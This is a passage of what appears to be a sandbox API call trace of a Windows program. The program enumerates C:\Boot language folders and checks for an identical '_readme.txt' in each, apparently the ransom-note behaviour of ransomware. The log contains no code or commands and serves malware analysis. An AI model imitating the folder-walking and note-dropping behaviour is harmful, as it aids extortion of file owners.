nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.577] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0146.577] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ebde0d0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ebde0d0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebde0d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.577] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ebde0d0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ebde0d0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ebde0d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.577] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.578] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.578] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.578] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.578] PathFindFileNameW (pszPath="C:\\Boot\\pl-PL\\") returned="pl-PL\\" [0146.578] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.578] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.578] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.578] PathFindFileNameW (pszPath="") returned="" [0146.578] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.578] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.578] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.578] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x800) returned 0x329e270 [0146.578] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.578] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x328f498 [0146.578] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.578] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.578] PathAppendW (in: pszPath="C:\\Boot\\pl-PL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 1 [0146.578] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.579] PathFileExistsW (pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 1 [0146.580] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec04230, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec04230, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.580] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec04230, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec04230, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.580] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0146.580] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec04230, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec04230, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec04230, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.580] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec04230, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec04230, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec04230, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.580] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.580] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.580] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.580] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.580] PathFindFileNameW (pszPath="C:\\Boot\\pt-BR\\") returned="pt-BR\\" [0146.580] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.580] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.580] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.580] PathFindFileNameW (pszPath="") returned="" [0146.580] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.580] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.581] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.581] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x800) returned 0x329e270 [0146.581] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.581] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x328ec10 [0146.581] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.581] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.581] PathAppendW (in: pszPath="C:\\Boot\\pt-BR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 1 [0146.581] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.581] PathFileExistsW (pszPath="C:\\Boot\\pt-BR\\_readme.txt") returned 1 [0146.582] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec2a390, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec2a390, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.582] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec2a390, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec2a390, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.582] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0146.582] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec2a390, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec2a390, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec2a390, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.582] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec2a390, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec2a390, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec2a390, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.582] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.582] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.582] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.582] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.582] PathFindFileNameW (pszPath="C:\\Boot\\pt-PT\\") returned="pt-PT\\" [0146.582] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.582] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.583] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.583] PathFindFileNameW (pszPath="") returned="" [0146.583] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.583] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.583] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.583] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x800) returned 0x329e270 [0146.583] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.583] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x328f498 [0146.583] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.583] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.583] PathAppendW (in: pszPath="C:\\Boot\\pt-PT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 1 [0146.583] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.583] PathFileExistsW (pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 1 [0146.584] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec2a390, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec2a390, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.584] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec2a390, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec2a390, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.584] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0146.584] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec2a390, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec2a390, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec2a390, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.584] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec2a390, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec2a390, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec2a390, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.584] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.585] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.585] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.585] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.585] PathFindFileNameW (pszPath="C:\\Boot\\ru-RU\\") returned="ru-RU\\" [0146.585] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.585] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.585] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.585] PathFindFileNameW (pszPath="") returned="" [0146.585] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.585] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.585] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.585] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x800) returned 0x329e270 [0146.585] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.585] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x328ec10 [0146.585] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.585] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.585] PathAppendW (in: pszPath="C:\\Boot\\ru-RU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 1 [0146.585] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.585] PathFileExistsW (pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 1 [0146.586] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec504f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec504f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.587] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec504f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec504f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.587] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0146.587] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec504f0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec504f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec504f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.587] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec504f0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec504f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec504f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.587] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.587] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.587] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.587] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.587] PathFindFileNameW (pszPath="C:\\Boot\\sv-SE\\") returned="sv-SE\\" [0146.587] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.587] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.587] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.587] PathFindFileNameW (pszPath="") returned="" [0146.587] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.587] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.587] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.588] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x800) returned 0x329e270 [0146.588] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.588] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x328f498 [0146.588] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.588] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.588] PathAppendW (in: pszPath="C:\\Boot\\sv-SE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 1 [0146.588] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.588] PathFileExistsW (pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 1 [0146.589] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec76650, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec76650, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.589] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec76650, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec76650, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.589] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0146.589] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec76650, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec76650, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec76650, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.589] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec76650, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec76650, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec76650, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.589] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.589] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.589] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.589] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.589] PathFindFileNameW (pszPath="C:\\Boot\\tr-TR\\") returned="tr-TR\\" [0146.589] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a28 [0146.589] PathFindFileNameW (pszPath="C:\\Boot\\") 